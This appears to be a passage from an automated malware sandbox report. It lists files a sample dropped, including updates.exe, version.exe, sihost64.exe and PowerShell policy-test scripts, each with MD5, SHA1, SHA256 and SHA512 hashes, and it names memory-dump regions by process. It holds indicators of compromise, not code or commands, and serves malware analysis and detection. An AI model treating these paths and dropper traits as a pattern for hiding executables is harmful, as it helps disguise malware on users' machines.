| SHA512 | 425695935096357af909f4f5b6d9052464fb3ec22d27f2f2bcb97366fd8c2a511976b0aad91aecbbf8287f9e0c701888d86f0f1eb50631dc9f4fbea6553b7e10 |
memory/2416-1264-0x0000000000750000-0x0000000000790000-memory.dmp
memory/3456-1265-0x0000000008200000-0x0000000008210000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\lmxavm5i.inf
| MD5 | 6f1420f2133f3e08fd8cdea0e1f5fe27 |
| SHA1 | 3aa41ec75adc0cf50e001ca91bbfa7f763adf70b |
| SHA256 | aed1ac2424a255f231168bcb02f16b6ea89603e0045465c2149abcde33a06242 |
| SHA512 | d5629e9835f881cd271e88d9ec2d2c27b9d5d1b25329ade5cfb9824a6358c9e98e66f1b89ac9459b4c540c02af2728129dd8523bdf007cadf28b5fa2d199a2aa |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\version.exe
| MD5 | f6a7ae96b4241a5dee91bcd8d46234dd |
| SHA1 | 2f439c19eb172cf7235b1497d4859fae4b77af42 |
| SHA256 | 75d8c02ce367c2c9fa14ae9226056f2428538f95ebc8728b935d4c927f6d065c |
| SHA512 | 915da2e1709c0d30e76b0d1487ca974fd6742fb27d978f6fa83632e3a43cfe44fa24c5101453259981759c28a928be77e411b68abb3140961bfe9185f9caca9b |
memory/2416-1273-0x000000001B490000-0x000000001B4A0000-memory.dmp
memory/2416-1274-0x000000001B490000-0x000000001B4A0000-memory.dmp
memory/3328-1275-0x00000000008C0000-0x00000000008C8000-memory.dmp
memory/3560-1282-0x000001F37BDE0000-0x000001F37BE02000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cdd4zsuw.nz2.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3560-1314-0x000001F37BE80000-0x000001F37BE90000-memory.dmp
memory/3560-1315-0x000001F37BE80000-0x000001F37BE90000-memory.dmp
memory/2836-1316-0x000001ABF8D70000-0x000001ABF8D80000-memory.dmp
memory/2836-1317-0x000001ABF8D70000-0x000001ABF8D80000-memory.dmp
memory/4276-1318-0x000002A520300000-0x000002A520310000-memory.dmp
memory/3560-1319-0x000001F37BE80000-0x000001F37BE90000-memory.dmp
memory/1780-1320-0x0000014967EF0000-0x0000014967F00000-memory.dmp
memory/2836-1321-0x000001ABF8D70000-0x000001ABF8D80000-memory.dmp
memory/3560-1322-0x000001F37BE80000-0x000001F37BE90000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d28a889fd956d5cb3accfbaf1143eb6f |
| SHA1 | 157ba54b365341f8ff06707d996b3635da8446f7 |
| SHA256 | 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45 |
| SHA512 | 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6d3e9c29fe44e90aae6ed30ccf799ca8 |
| SHA1 | c7974ef72264bbdf13a2793ccf1aed11bc565dce |
| SHA256 | 2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d |
| SHA512 | 60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d28a889fd956d5cb3accfbaf1143eb6f |
| SHA1 | 157ba54b365341f8ff06707d996b3635da8446f7 |
| SHA256 | 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45 |
| SHA512 | 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c |
memory/1316-1332-0x0000000000400000-0x000000000040C000-memory.dmp
memory/3456-1335-0x0000000008200000-0x0000000008210000-memory.dmp
memory/3456-1336-0x0000000008200000-0x0000000008210000-memory.dmp
memory/1316-1337-0x0000000004FB0000-0x0000000004FC0000-memory.dmp
memory/500-1338-0x0000000005530000-0x0000000005540000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updates.exe
| MD5 | 364d64feddb1df47bf70b0d1006e4829 |
| SHA1 | 6a6405fa10ea2cc8009b3b81e13e5c10535f7efb |
| SHA256 | bbc2ff98d89352331a92cc47eb6114a5e05cb5ba3c31924717d36af4d9690574 |
| SHA512 | 6e104a8a6bd8ade6fdd0e82f5e7f92dcda84626737dbfea7df1bb4ea0365efae71dd51d3dc4399a1fd27da9398dbdbaa17ea2146babf2c06c632d5d5cbec2837 |
memory/4584-1342-0x0000000000C40000-0x0000000000E62000-memory.dmp
memory/4584-1343-0x00000000016C0000-0x00000000016D0000-memory.dmp
memory/1316-1344-0x0000000004FB0000-0x0000000004FC0000-memory.dmp
memory/1368-1355-0x000002310B030000-0x000002310B040000-memory.dmp
memory/3628-1371-0x00000272F16D0000-0x00000272F16E0000-memory.dmp
memory/3628-1372-0x00000272F16D0000-0x00000272F16E0000-memory.dmp
memory/4436-1387-0x000001B935A80000-0x000001B935A90000-memory.dmp
memory/4436-1388-0x000001B935A80000-0x000001B935A90000-memory.dmp
memory/4436-1389-0x000001B935A80000-0x000001B935A90000-memory.dmp
memory/4584-1393-0x00000000016C0000-0x00000000016D0000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
| MD5 | 5dd22e74d6c217412eb8c75e08b25171 |
| SHA1 | e4dfc26cdbcecfef0ef21c6b0988b3699d858c44 |
| SHA256 | c4fb4643cc28e909b872b3c899e796a592154e0e6b702e762e956c71f8c54e06 |
| SHA512 | e3a616ae3e1956c115a613d92db76a1f9a4115f73b1a8cb964f42b10eb296c97b04af42690f3a66339aedf259cee518d868a17f692c371fd4d174cc07bb6b151 |
C:\Users\Admin\AppData\Local\Temp\updates.exe
| MD5 | 364d64feddb1df47bf70b0d1006e4829 |
| SHA1 | 6a6405fa10ea2cc8009b3b81e13e5c10535f7efb |
| SHA256 | bbc2ff98d89352331a92cc47eb6114a5e05cb5ba3c31924717d36af4d9690574 |
| SHA512 | 6e104a8a6bd8ade6fdd0e82f5e7f92dcda84626737dbfea7df1bb4ea0365efae71dd51d3dc4399a1fd27da9398dbdbaa17ea2146babf2c06c632d5d5cbec2837 |
memory/3684-1411-0x0000000000130000-0x0000000000138000-memory.dmp
memory/1632-1448-0x00000000010A0000-0x00000000010B0000-memory.dmp
memory/3684-1449-0x0000000000E90000-0x0000000000EA0000-memory.dmp
memory/1140-1450-0x000002829BFA0000-0x000002829BFB0000-memory.dmp
memory/1140-1455-0x000002829BFA0000-0x000002829BFB0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\TSPDOR~1.EXE
| MD5 | 560cb4c22eef8363ad5a68115c1e1d68 |
| SHA1 | ed7de753e52433abbfc9c40b4d93c17989e7af0e |
| SHA256 | f408d849ff9173f5d155c2f62ee6fd206c0c3a343ee42699baeb9c44a4787030 |
| SHA512 | cf4f8944784662d27bb4056982e334941531039cc39ab8f3e828cda68f8833c6e0a318aeb278166d8377ecd6a40281bf2f77a611bf073e78da877e229cd7a0a0 |
memory/4516-1502-0x0000000005590000-0x00000000055A0000-memory.dmp
memory/4516-1503-0x0000000005590000-0x00000000055A0000-memory.dmp
memory/1632-1504-0x000000001C1A0000-0x000000001C1B2000-memory.dmp
memory/2876-1526-0x0000000140000000-0x0000000140758000-memory.dmp
memory/2876-1525-0x0000000140000000-0x0000000140758000-memory.dmp
memory/2876-1527-0x0000000140000000-0x0000000140758000-memory.dmp
memory/2876-1530-0x0000000001200000-0x0000000001220000-memory.dmp
memory/2876-1543-0x0000000140000000-0x0000000140758000-memory.dmp
memory/2876-1544-0x0000000140000000-0x0000000140758000-memory.dmp
memory/2876-1545-0x0000000140000000-0x0000000140758000-memory.dmp
memory/2876-1546-0x0000000140000000-0x0000000140758000-memory.dmp
memory/2876-1547-0x0000000140000000-0x0000000140758000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Settings\language.txt
| MD5 | a54755df5bde02687d657e9703763c8a |
| SHA1 | 0af546d58ada5760bf6451de7b72fb2e125687c1 |
| SHA256 | 93eaaad295c94f5b52113b9032a16310e01a620e52557e4db08d826914bef869 |
| SHA512 | e1e6a9a91bd2089e3c95617b4912237590c92e8e4dda045ded142431ace2103110b303129102f2171d2a6b9ca79eea70839d37cbf572fa6e49f69b3e25f2d626 |